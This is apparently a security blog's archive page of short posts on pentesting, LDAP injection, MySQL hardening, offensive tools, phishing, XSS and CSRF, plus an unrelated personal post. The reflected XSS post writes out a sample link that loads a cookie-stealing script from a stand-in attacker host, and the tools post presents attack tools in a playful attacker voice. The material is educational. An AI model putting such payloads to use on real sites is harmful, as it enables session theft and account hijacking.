What is Wireless Pentesting?

Every discovery or invention ever made has some kind of radiation. Sometimes it is a positive vibe radiated, and sometimes it is a negative vibe. Sometimes the radiation is something chemical, and sometimes it is electrical. Every single life depends on such radiation. Even a human body radiates some warmth. Speaking of radiation, let’s talk about the radiations we often use in daily life which are also known as “Electromagnetic Fields” or EMFs that are emitted from a wireless router or what we often call “Wi-Fi”. The world is turning digital and so are our needs. Whatever you ask or wish for can be done digitally via the internet. From buying to selling, learning to teaching, paying to receiving, and so much more. You could say, we’re totally attached to digital life. A Wireless router is one of the most popular sources of access to the internet. Wi-Fi is basically a phenomenon that increases the capability of computer systems and allows them to connect and communicate with each other via the internet or you can say via an EMF. Well, we know that communication between devices is important to share data but is it safe or secure? Maybe or maybe not. Nothing is ever safe in the entire cosmic creation until proper actions have been taken to secure it. Wireless is no exception to it.

Before moving ahead, let’s think about “What does wireless security/pentesting mean?”.

Since the creation of entire existence, there isn’t anything created that isn’t even a little bit flawed regardless of what it is. Since “Wireless” is the star of our eye here, it isn’t anything different. Wireless security simply means protecting our network to secure ourselves from the danger that hovers above us while using the internet. In other words, wireless security refers to the prohibition of access to a computer system for those who are unauthorized so that no one faces any kind of loss. The internet is expanding further and further across the world and so are the dangers crawling in between it. For the sake of our own privacy and peace, it is quite important to have a secure network.

Now let the discussion moves towards wireless pentesting. For proper security to be applied to something, it’s necessary to first analyze as to where that security is needed to be applied. In other words, it is necessary to find all the vulnerabilities or flaws in a system so as to patch it and make it secure. This is known as pentesting in layman’s terms. Pentesting or Penetration testing is basically a process where a tester or hacker tries to hack into a computer system so that he/she can find a vulnerability that allows him/her to get into the system which later on patched up or secured. Wireless pentesting is the same as well. In other words, wireless pentesting refers to the process of withdrawing out vulnerabilities that can allow an attacker/hacker to get into a network and can cause harm to a user.

We’ve discussed the meaning of wireless pentesting; now let’s take steps towards “Why it is necessary?”

The growing and expanding digital world is capable to make your work/task efficient as well as harm or destroy you. An excess amount of something is always dangerous. This applies to a network as well. In the age of cyber technology and ongoing cybercrimes, it is necessary to keep your distance from the harm. Let’s talk about what could happen in an insecure network. Since we’re talking about the wireless network here, let’s face the facts about that. The spreading of knowledge in the world can only reach so far. But wherever it reaches, there is someone who misuses this knowledge. Some hackers are one of them which you can also call “Black hat hackers”. There are many destructions an attacker can cause if he/she gets into your network. One of the destructive attacks is a “Man in the middle” attack where an attacker can get into your network and control the flow of data through a system to another without any knowledge of the actual users or owners of those systems. Another instance of the attack is the “KRACK” attack where an attacker can break or crack the password security on a network and can intrude into a system and steal your data, payment card details, identity and so much more. An attacker can easily take control over an insecure wireless network or a wireless device and can sniff out sensitive data that you send or receive using that network and use it against you to maybe demand a ransom or maybe hurt you emotionally or someone you care about. In the end, none of these attacks or threats results in anything good.

April 15, 2022 by Cyber Security 0

Lightweight Directory Access Protocol (LDAP) injection

Photo by Markus Spiske on Unsplash

LDAP is a protocol that lets applications talk with directory services servers that store user IDs, passwords, and computer accounts. When applications accept user input and execute it, attackers can exploit the LDAP server by sending malicious requests.

Some examples of LDAP coding issues include:

  • Excess access privileged assigned to LDAP accounts
  • Lack of output regulation
  • Inability to perform dynamic checks
  • Lack of static source code analysis
March 20, 2022 by Software 0

What is Network Security?

Photo by Scott Webb on Unsplash

In this vulnerable world, it’s necessary to take steps for the sake of existence. It could be against anything; whether it is a disease, an accident or maybe even a flaw in the system of existence.

One of the most important parts of a lifestyle is a NETWORK. Everything is done on a network in the upcoming digital world. From viewing to advertising, from purchasing to selling and from learning to teaching. Therefore, it is necessary to secure a network just so all users can keep themselves protected.

Now the first question that comes to our mind is “What is network security?”

Network security is basically a number of steps we walk on or follow in order to protect ourselves from different kind of threats which may include integrity, confidentiality, and availability of our data. These steps can be applied to both hardware equipment as well as software technologies. Effective and sufficient security steps allow secure and efficient access to the network. The main objective of network security is to detect all the flaws and vulnerabilities and patch them up just so a user is provided with a secure connection.

Before following any step, a person always wonders as to why is network security necessary or important?

Apparently, the most important and greatest reason for this is the attacks that a lot of users fall victim to while spending their time on the internet. There’s a huge variety of attacks that are often performed to disrupt a network. Some of the most common attacks that are often performed these days from which we need to protect ourselves are Malware attacks which are often initialized to disrupt, damage or gain unauthorized access to a network or a computer system, Botnets where a number of private computers are infected using corrupted software so that those systems can be controlled altogether without the knowledge of their owners to initiate a new attack, DoS(Denial of Service) where an attacker spams a huge amount of data packet onto a system or a server just to make it lose its connection or to make it overload and break and so much more attacks like such. Sometimes we fall a victim to an entire organization’s attack because of multiple systems and an efficient amount of resources being present there just to initiate an attack regardless of all the efforts needed to be put in for the attack. As in May 2017, a huge amount of systems running the Microsoft operating system were exploited all over the world by a single attack known as “WannaCry ransomware”. This attack encrypted all the data present in target systems and the exploiters demanded ransom payment in the bitcoin currency from the victim user in return for their own data. The attack was estimated to have affected more than 0.2 million computer systems across 150 countries, with a total damage of about millions to billions of dollars.

One thing that we think about is, “What are the harmful events than a hacker can cause which makes us take steps towards network security?”

The most important reason for implementing network security is the destruction an attacker or hacker can cause to you or your system. An attacker can sniff out your every username and password that you use in different accounts, they can disrupt your funding cards like credit or debit card or even use those cards to steal money from you, they can misuse your social security number, they can steal your sensitive data and misuse them, they can steal your identity and impersonate you while committing some serious crime and there’s so much more an attacker/hacker can do to harm you. Being in an advanced world. there a lot of devices that have been invented that makes it efficient for an attacker to harm you one of which is “LAN TURTLE” which can blend in physically with other network devices and can be used to gain remote and unauthorized access to your system by completely bypassing the network firewall and can steal and store any data available, “Bash Bunny” another device that can hijack your network and inject any malware or virus through that network to corrupt or infect your system added to which, this device can also gain access to the shell of your system and steal out any information that the attacker wants. Another device that is known as “LANTAP” is one of the most famous yet notorious devices that is capable enough to tap into your network scan and analyze all the incoming and outgoing data through your network which can be modified or even disrupted in its path and also can be decrypted using various tools if ever encrypted.

All these words conclude up to the fact that network security is quite essential in the trending digital lifestyle just so we’re able to use the internet at its full extent without facing any negatives that could lead us to a great loss.

March 15, 2022 by Network Security 0

How to Improve MySQL Security: Top 10 Ways

Photo by Campaign Creators on Unsplash

In the pantheon of open source heavyweights, few technologies are as ubiquitous as the MySQL RDBMS. Integral to popular software packages like WordPress and server stacks like LAMP, MySQL is the foundational data platform for most websites and cloud services on the internet today. Unfortunately, its popularity translates to more commonly known attack vectors and security exploits — the following are 11 ways to shore up MySQL security and protect your data more effectively.

10 Ways to Improve MySQL Security

1. Drop the Test Database

The test database installed by the MySQL Server package as part of the mysql_install_db process can be fully accessed by all users by default, making it a common target for attackers. It should therefore be removed during post-installation hardening.

2. Remove All Anonymous Accounts

MySQL, by default, creates several anonymous users that essentially serve no purpose after installation. These accounts should therefore be removed, as their presence on the system gives attackers an entry point in the database.

3. Obfuscate the Root Account

Changing the MySQL root user account to a hard-to-guess name adds another layer of security, as attackers must determine the new account name before attempting to brute force the password values.

4. Disable Remote Logins

If local applications only use the MySQL database, remote access to the server should be disabled. This is done by opening up the /etc/my.cnf file and adding a skip-networking entry under the [mysqld] section. Configuring MySQL to stop listening on all TCP/IP ports, including 127.0.0.1, will effectively restrict database access to local, MySQL socket-based communications.

5. Change Default Port Mappings

MySQL, by default, runs on port 3306. This should be changed after installation to obfuscate what critical services are running on which ports, as attackers will initially attempt to exploit default values.

6. Remove and Disable the MySQL History File

Like the Test database, the MySQL history file located at ~/.mysql_history is created by default during installation. This file should be deleted, as it contains historical details regarding installation and configuration steps performed. This could potentially result in the accidental exposure of passwords for critical database users. A weak link for the .mysql_history file to the null device should be created to stop logging into the file.

7. Do Not Run MySQL With Root Level Privileges

MySQL should be run under a specific, newly-created user account with the necessary permissions to run the service instead of directly as the root user. This adds some auditing and logging benefits while preventing attackers from gaining access by hijacking the root user account.

8. Alter Which Hosts Have Access to MySQL

If set up as a standalone server (i.e., application and web servers query the database from another server), the MySQL instance should be configured only to allow access to permitted hosts. This can be accomplished by making the appropriate changes in the hosts. deny and hosts.allow files.

9. Limit or Disable SHOW DATABASES

Again, stripping remote attackers of their information gathering capabilities is critical to a secure security posture. For this reason, the SHOW DATABASES command should be limited or removed entirely by adding skip-show-database to the [mysqld] section of the MySQL configuration file at /etc/my.cnf.

10. Disable the Use of LOAD DATA LOCAL INFILE Command

The LOAD DATA LOCAL INFILE command allows users to read local files and even access other files on the operating system, which could be exploited by attackers using methods such as SQL injection. The command should therefore be disabled by inserting set-variable=local-infile=0 to the [mysqld] section of my.cnf.

February 28, 2022 by Software 0

8 Offensive Security Tools for SysAdmins

Photo by ThisisEngineering RAEng on Unsplash

Metasploit Framework Metasploit Framework – an open-source tool for exploit development and penetration testing. Metasploit is well known in the security community. Metasploit has exploited for both server and client-based attacks; with feature-packed communication modules (meterpreter) that make pwning systems fun! The framework now includes Armitage for point and click network exploitation. This is the go-to tool if you want to break into a network or computer system.

Defending against Metasploit :

  • Keep all software updated with the latest security patches.
  • Use strong passwords on all systems.
  • Deploy network services with secure configurations.

Ettercap Ettercap – a suite of tools for man in the middle attacks (MITM). Once you have initiated a man in the middle attack with Ettercap, use the modules and scripting capabilities to manipulate or inject traffic on the fly. Sniffing data and passwords are just the beginning; inject to exploit FTW!

Defending against Ettercap :

  • Understand that ARP poisoning is not difficult in a typical switched network.
  • Lockdown network ports.
  • Use secure switch configurations and NAC if the risk is sufficient.

SSLStrip sslstrip – using HTTPS makes people feel warm, fuzzy, and secure. With sslstrip, this security can be attacked, reducing the connection to an unencrypted HTTP session, whereby all the traffic is readable. Banking details, passwords, and emails from your boss, all in the clear. Even includes a nifty feature where the favicon on the unencrypted connection is replaced with a padlock just to make the user keep that that warm fuzzy feeling.

Defending against sslstrip :

  • Be aware of the possibility of MITM attacks (arp, proxies/gateway, wireless).
  • Look for sudden protocol changes in the browser bar. Not really technical mitigation!

Evilgrade evilgrade – another man in the middle attack. Everyone knows that keeping software updated is the way to stay secure. This little utility fakes the upgrade and provides the user with a not so good update. Can exploit the upgrade functionality on around 63 pieces of software including Opera, Notepad++, VMware, Virtualbox, iTunes, QuickTime and Winamp! It really whips the llama’s ass!

Defending against evilgrade :

  • Be aware of the possibility of MITM attacks (arp attacks, proxy/gateway, wireless).
  • Only perform updates to your system or applications on a trusted network.

Social Engineer Toolkit Social-Engineer Toolkit – makes creating a social engineered client-side attack way too easy. Creates the spear phish, sends the email and serves the malicious exploit. SET is the open-source client-side attack weapon of choice.

Defending against SET:

  • User awareness training around spear phishing attacks.
  • Strong Email and Web filtering controls.

SQLmap sqlmap – SQL Injection is an attack vector that has been around for over 10 years. Yet it is still the easiest way to get dumps of entire databases of information. Sqlmap is not only a highly accurate tool for detecting SQL injection, but also has the capability to dump information from the database and to even launch attacks that can result in operating system shell access on the vulnerable system.

Defending against sqlmap :

  • Filter all input on dynamic websites (secure the web applications).
  • Use mod_proxy or other web-based filtering controls to help block malicious injection attacks (not ideal as often able to bypass these web application firewalls (WAF).

Aircrack-NG aircrack-ng – breaking holes in wireless networks for fun and profit. A suite of tools that enables all manner of wireless network attacks.

Defending against aircrack-ng:

  • Never use WEP
  • When using WPA2 with pre-shared keys, ensure passwords are strong (10+ characters non-dictionary based passwords).

oclHashcat oclHashcat – Need to get some passwords from the hashes you grabbed with sqlmap? Use this tool to bust them open. Over 48 different hashing algorithms supported. Will use the GPU (if supported) on your graphics card to find those hashes many times faster than your clunky old CPU.

Defending against oclHashcat:

  • Passwords are the weakest link. Enforce password complexity.
  • Protect the hashed passwords.
  • Salt the hashes.
February 15, 2022 by Cyber Security 0

No Social Media, No Cellular Data

Photo by camilo jimenez on Unsplash

As we confront the onset of 2020 with the force of a charging bull, it feels apt to formally document my New Year’s Resolutions for this year.

I’ve distilled my aspirations into two, but they carry a significant weight.

Truthfully, these transformative changes have been simmering in my thoughts for several months, if not years. Both are centered around refining how I interact with computers, enhancing my overall quality of life and happiness.

The essence of computing should enrich our lives, improve them, and elevate our happiness. If any aspect of the technological landscape—hardware, software, services, or features—contributes to discomfort, perhaps it’s time to contemplate letting it go.

My inaugural Resolution for 2020 is a seemingly simple yet essential shift that I’ve passionately advocated for throughout my journey, as followers of my timeline may already be aware.

No More Social Media.

Photo by Alexander Shatov on Unsplash

Indeed, I am resolving to eliminate social media from my life entirely. This encompasses platforms such as X, Facebook, LinkedIn, Reddit, YouTube, and their equivalents. No more engaging in posting, reading, liking, commenting, or re-sharing content on any of these services or their analogs. While I’ll maintain the accounts to prevent impersonation, they will be closed off from active use.

I am convinced that the concept of Social Media is inherently flawed. This realization has been percolating in my mind for quite some time. Regrettably, I found myself succumbing to the addictive nature of these platforms, only to conclude that they do not contribute a net positive impact on my life, both personally and publicly.

Tried to quit social media in 2019.  I failed.

In 2020, I’m embarking on another attempt at redefining my online presence. While I bid farewell to Social Media, I must note that my departure from these platforms doesn’t equate to a complete disconnection from the digital realm (yes, I still hyphenate that word). I will maintain accessibility through email, both the traditional Internet version.

Anticipating a spectrum of reactions, some will assert, “Impossible!” while others will confidently declare, “So easy! I already do that!” There might even be a handful lurking in the corners of the globe, crafting random mean or snarky remarks on X. The beauty of it all? I won’t be privy to any of it. So, feel free to snark away — it’s all good from my perspective.

Honestly, I’m guessing I won’t be the only one with such a resolution for 2020… here’s hoping we all succeed.

No More Cellular Data Service.

Photo by Alexander Andrews on Unsplash

As my second New Year’s Resolution, I’m taking a decisive step by discontinuing cellular data. This means bidding farewell to smartphones equipped with ever-present Internet connections, be it an iPhone with 4G, an Android phone with 5G, or even a Linux-oriented phone boasting a speculative 17G connection (or whatever G designation they decide on by the close of 2020).

I find modern smartphones’ “always connected” nature to be stress-inducing and negatively impacting my quality of life.  While there are certainly some benefits… the negative aspects of being constantly connected are simply too strong. I’ll still let myself have a phone.  But my phone… will just be a phone. When I’m walking around town, I have no Internet connection.  I’ll be offline without sitting at my computer (“In the real world”).

Maybe I’ll have two devices- one PDA (I’m bringing that acronym back) and one phone.  Perhaps I’ll settle on a single PDA-Phone (just without any 2G/3G/4G/5G/whatever connection).  I haven’t decided on that part yet.

Thus far, things have gone relatively smoothly.  Over the coming days, I’ll keep my smartphone turned off and see if any problems crop up.  I’m sure there will be some inconveniences — we’ve all gotten so used to smartphones with always-on data connections — but I am anticipating, based on how it has gone so far, an overall positive experience leading up to January 1st.

Does anyone expect to be on their deathbeds and have their final thought be, “Darn, wish I would have liked a few more things on X?”  Or, “I wish I would have spent more time surfing the web on my cell phone while at dinner with my family?”

Will these changes positively impact my life and overall happiness (which is already pretty high, but why not shoot for even better)? Will any inconveniences crop up that are insurmountable? Will I experience gains (or losses) in productivity?

January 23, 2022 by Privacy 0

What is Spear Phishing?

Photo by Crawford Jolly on Unsplash

Phishing is a cyber attack that gathers sensitive information like login credentials, credit card numbers, bank account numbers, or other financial information by masquerading as a legitimate website or email. In addition, personal information like social security numbers, phone numbers, and social media account information are also common targets for cybercriminals who perform identity theft.

Phishing scams trick victims using social engineering to create a sense of urgency. Once the victim opens a phishing email or text message and clicks the malicious link, they are taken to a fake website that matches the legitimate site.

Common phishing attempts clone financial institutions, emails from colleagues, social media sites, and online payment processors.

Despite being one of the oldest cyber crimes, phishing remains a significant cyber threat to many organizations. This is due to its widespread use and sophisticated phishing campaigns. In addition, phishers are increasingly gathering information about their targets to improve the effectiveness of their phishing messages.

Security awareness training is a great way to minimize phishing’s cyber security risk. Phishing emails may also contain infected attachments to install malware such as ransomware or to gain unauthorized access to sensitive data to cause a data breach.

It’s important to remember that some of the most significant data breaches come from outside of your organization. If your third-party vendors have access to sensitive data, then it’s as essential to have them educate their staff about phishing risks. Third-party risk, fourth-party risk, and vendor risk related to phishing must be part of your third-party risk management framework and vendor risk management program.

January 12, 2022 by Cyber Security 0

Cross-site Scripting (XSS) Attacks

Photo by Shahadat Rahman on Unsplash

What is Cross-Site Scripting (XSS)

Cross-site scripting (XSS) is a common attack vector that injects malicious code into a vulnerable web application. XSS differs from other web attack vectors (e.g., SQL injections), in that it does not directly target the app itself. Instead, the users of the web application are the ones at risk. A successful cross-site scripting attack can have devastating consequences for an online business’s reputation and its relationship with its clients.

Depending on the severity of the attack, user accounts may be compromised, Trojan horse programs activated, and page content modified, misleading users into willingly surrendering their private data. Finally, session cookies could be revealed, enabling a perpetrator to impersonate valid users and abuse their personal accounts.

Cross-site scripting attacks can be broken down into two types: stored and reflected.
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application.
Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user’s browser. The script is embedded into a link and is only activated once that link is clicked on.

December 29, 2021 by Application Security 0

Reflected Cross-Site Scripting (XSS) Attacks

Photo by Towfiqu barbhuiya on Unsplash

What is a reflected XSS attack

Reflected XSS attacks, also known as non-persistent attacks, occur when a malicious script is reflected off of a web application to the visitor’s browser. The script is executed through a link, which sends a request to a website with a vulnerability that enables the execution of malicious scripts. The vulnerability is typically a result of incoming requests not being sufficiently sanitized, which allows for the manipulation of a web application’s functions and the activation of malicious scripts.

To distribute the malicious link, a perpetrator typically embeds it into an email or third party website (e.g., in a comment section or on social media). The link is embedded inside an anchor text that provokes the user to click on it, which initiates the XSS request to an exploited website, reflecting the attack back to the user.

Unlike a stored attack, where the perpetrator must locate a website that allows for the permanent injection of malicious scripts, reflected attacks only require that the malicious script be embedded into a link. That being said, in order for the attack to be successful, the user needs to click on the infected link.

As such, there are a number of key differences between reflected and stored XSS attacks, including:

  • Reflected attacks are more common.
  • Reflected attacks do not have the same reach as stored XSS attacks.
  • Reflected attacks can be avoided by vigilant users.

With a reflected XSS, the perpetrator plays a “numbers game” by sending the malicious link to as many users as possible, thereby improving his odds of successfully executing the attack.

Reflected XSS Attack

While visiting a forum site that requires users to log in to their account, a perpetrator executes this search query alert(‘XSS’); causing the following things to occur:

  1. The query produces an alert box saying: “XSS”.
  2. The page displays: “<script type=’text/javascript’>alert(‘XSS’);</script > not found.”
  3. The page’s URL reads http://ecommerce.com?q=<script type=”text/javascript”>alert(‘XSS’); </script>.

This tells the perpetrator that the website is vulnerable. Next, he creates his own URL, which reads

http://forum.com?q=news<\script%20src=”http://hackersite.com/authstealer.js” and embeds it as a link into a seemingly harmless email, which he sends to a group of forum users.

While the sending address and subject line may appear suspect to some, it does not mean that it won’t be clicked on.

In fact, even if only one in every 1,000 recipients of the email clicks on the link, that still amounts to several dozen infected forum users. They will be taken to the forum’s website, where the malicious script will be reflected back to their browser, enabling the perpetrator to steal their session cookies and hijack their forum accounts.

December 15, 2021 by Application Security 0

Methods of CSRF Mitigation and Prevention

Photo by Pawel Czerwinski on Unsplash

A number of effective methods exist for both the prevention and mitigation of CSRF attacks. From a user’s perspective, prevention is a matter of safeguarding login credentials and denying unauthorized actors access to applications.

Best practices include:

  • Logging off-web applications when not in use
  • Securing usernames and passwords
  • Not allowing browsers to remember passwords
  • Avoiding simultaneously browsing while logged into an application

For web applications, multiple solutions exist to block malicious traffic and prevent attacks. Among the most common mitigation methods is to generate unique random tokens for every session request or ID. These are subsequently checked and verified by the server. Session requests having either duplicate tokens or missing values are blocked. Alternatively, a request that doesn’t match its session ID token is prevented from reaching an application.

Double submission of cookies is another well-known method to block CSRF. Similar to using unique tokens, random tokens are assigned to both a cookie and a request parameter. The server then verifies that the tokens match before granting access to the application.

While effective, tokens can be exposed at a number of points, including in browser history, HTTP log files, network appliances logging the first line of an HTTP request and referrer headers, if the protected site links to an external URL. These potential weak spots make tokens less than the full-proof solution.

Using custom rules to prevent CSRF attacks

The highly individual nature of CSRF attacks hinders the development of a one-size-fits-all solution. However, custom security policies can be employed to secure against possible CSRF scenarios.

This method completely counters the social engineering aspect of CSRF attacks. It prevents the execution of malicious requests outside of a security perimeter, regardless of content.

Alternatively, you can run the rule in ‘Alert Only’ mode to track possible exploit attempts or present CAPTCHAs that alert unwary users.

November 15, 2021 by Application Security 0

Recent Comments

No comments to show.